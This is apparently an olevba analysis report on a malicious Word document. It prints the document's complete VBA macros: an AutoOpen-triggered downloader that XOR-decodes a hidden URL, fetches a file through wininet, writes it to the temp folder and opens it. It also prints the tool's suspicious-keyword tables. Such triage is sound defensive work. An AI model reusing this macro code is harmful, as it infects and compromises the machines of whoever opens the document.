olevba 0.25 - http://decalage.info/python/oletools Flags Filename ----------- ----------------------------------------------------------------- OLE:MASIHB- 02.doc (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown) =============================================================================== FILE: 02.doc Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: 02.doc - OLE stream: u'Macros/VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub InIn() CALTHA End Sub Sub autoopen() InIn End Sub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +----------+----------+---------------------------------------+ | Type | Keyword | Description | +----------+----------+---------------------------------------+ | AutoExec | AutoOpen | Runs when the Word document is opened | +----------+----------+---------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO FILE6.bas in file: 02.doc - OLE stream: u'Macros/VBA/FILE6' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Option Explicit Public Const BRITTANIA = "BRITTANY" Private Const BRANDI = 8162 Private Const BRANDY As String = "HAZ" Private Const BREANA = 1 Private Const BREDA = &H4000000 Public Function BRENDA _ (ByVal BREE As String) As Boolean #If VBA7 _ And Win64 Then Dim BRETT As LongPtr, BRIANNA As LongPtr #Else Dim BRETT As Long, BRIANNA As Long #End If Dim BRIAR As Long Dim BRIDGET As String * BRANDI, BRIELLE As String Dim BRIER As Integer, BRIONY As Double BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0) If BRETT = 0 Then Exit Function End If Dim FiGaMan As Boolean If BRITANNIA(BRIANNA, BRETT) Then End If If BRIANNA = 0 Then BRIONY = 0 Else BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR BRIELLE = BRIDGET Do While BRIAR <> 0 BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR Dim BRITT As Long For BRITT = 6 To 8 If BRITT = 38 Then End Next BRITT BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR) Loop BRIONY = Len(BRIELLE): BRIER = FreeFile Open BREE _ For Binary Access Write _ Lock Write _ As #BRIER Put #BRIER, _ , BRIELLE Dim BRITTA As Double For BRITTA = 2 To 3 If BRITTA = 37 Then End Next BRITTA Close #BRIER End If BRITTANI BRIANNA BRITTANI BRETT BRIELLE = "" If BRIONY Then BRENDA = True End If End Function Public _ Function BRITTNEY(BRITTNY _ As _ String) BROGAN End Function Public Function BROGAN() Dim BRONTE As Object Set BRONTE = CreateObject _ (BROOK(BROOKE, BROOKLYN)) Dim BRYANNA As Object Set BRYANNA = BRYONY(BRONTE) Dim BUFFY Dim BUNNY BUNNY = BROOK(BROOKE, BUNTY) BUFFY = BRYANNA & BUNNY Dim BURGUNDY As Integer For BURGUNDY = 6 To 7 If BURGUNDY = 33 Then End Next BURGUNDY Dim CADENCE As Integer For CADENCE = 2 To 3 If CADENCE = 34 Then End Next CADENCE If CADY(BRONTE, BUFFY) Then BRONTE. _ DeleteFile BUFFY End If If BRENDA(BUFFY) Then End If If CADY(BRONTE, BUFFY) Then End If Dim CAELIE Set CAELIE = CreateObject _ (BROOK _ (BROOKE, CAETLIN)) CAELIE.Open BUFFY End Function Public Function CANDICE(CANDIDA As String) As Integer CANDICE = Len(CANDIDA) End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+----------------+-----------------------------------------+ | Type | Keyword | Description | +------------+----------------+-----------------------------------------+ | Suspicious | CreateObject | May create an OLE object | | Suspicious | Open | May open a file | | Suspicious | Write | May write to a file (if combined with | | | | Open) | | Suspicious | Put | May write to a file (if combined with | | | | Open) | | Suspicious | Binary | May read or write a binary file (if | | | | combined with Open) | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | +------------+----------------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO PIDLE0.bas in file: 02.doc - OLE stream: u'Macros/VBA/PIDLE0' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub CALTHA() Dim CAMELLIA As Long Dim CANDIS As Double For CANDIS = 44 To 46 If CANDIS = 32 Then End Next CANDIS CAMELLIA = 89 CALANTHA (CAMELLIA) End Sub Public Function BROOK(CAMERON As String, CAMILLA As String) As String Dim CAMILLE As Integer Dim CAMMIE As Integer Dim CAMRYN As Double For CAMRYN = 1 To 3 If CAMRYN = 32 Then End Next CAMRYN Dim CANDACE As Long Dim CANDI As String For CANDACE = 1 _ To _ ( _ CANDICE _ (CAMILLA) _ / 2) CAMILLE = Val("&H" & _ (Mid$(CAMILLA, _ (2 * CANDACE) - 1, 2))) CAMMIE = Asc(Mid$(CAMERON, _ ((CANDACE Mod Len(CAMERON)) + 1), 1)) CANDI = CANDI + Chr(CAMILLE Xor CAMMIE) Next CANDACE BROOK = CANDI End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+---------+-----------------------------------------+ | Type | Keyword | Description | +------------+---------+-----------------------------------------+ | Suspicious | Chr | May attempt to obfuscate specific | | | | strings | | Suspicious | Xor | May attempt to obfuscate specific | | | | strings | +------------+---------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO IDL4.bas in file: 02.doc - OLE stream: u'Macros/VBA/IDL4' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Public Const CAETLIN = "6750505D5F1E74464055585B544C5B565A" Public Const BUNTY = "68425A535244051801581F5D4D5D" Public Const CAITLYN = "5C4C4141091F1A504A4A4716515D1D0B06071A0E011E524A56" Public Const BROOKLYN = "675B475843445C5857177751595D61404743505576525D575040" Public Const BROOKE = "3485130560918582947589072346987" #If VBA7 And Win64 Then Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr #Else Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long #End If Public Function BRYONY(ByRef CALANTHE As Object) As Object Set BRYONY = CALANTHE.GetSpecialFolder(2) End Function Sub CALANTHA(CALEIGH As Long) BRITTNEY ("CALANTHIA") End Sub Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean If CAILEIGH.FileExists(CAILYN) Then CADY = True Else CADY = False End If End Function #If VBA7 _ And Win64 Then Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean #Else Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean #End If Dim CALLIDORA As String CALLIDORA = BROOK(BROOKE, CAITLYN) CALIDA _ = CALLIE _ ( _ CALLA, _ CALLIDORA, vbNullString, _ 0, _ BREDA, 0) BRITANNIA = True End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+----------------+-----------------------------------------+ | Type | Keyword | Description | +------------+----------------+-----------------------------------------+ | Suspicious | Lib | May run code from a DLL | | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | | IOC | wininet.dll | Executable file name | +------------+----------------+-----------------------------------------+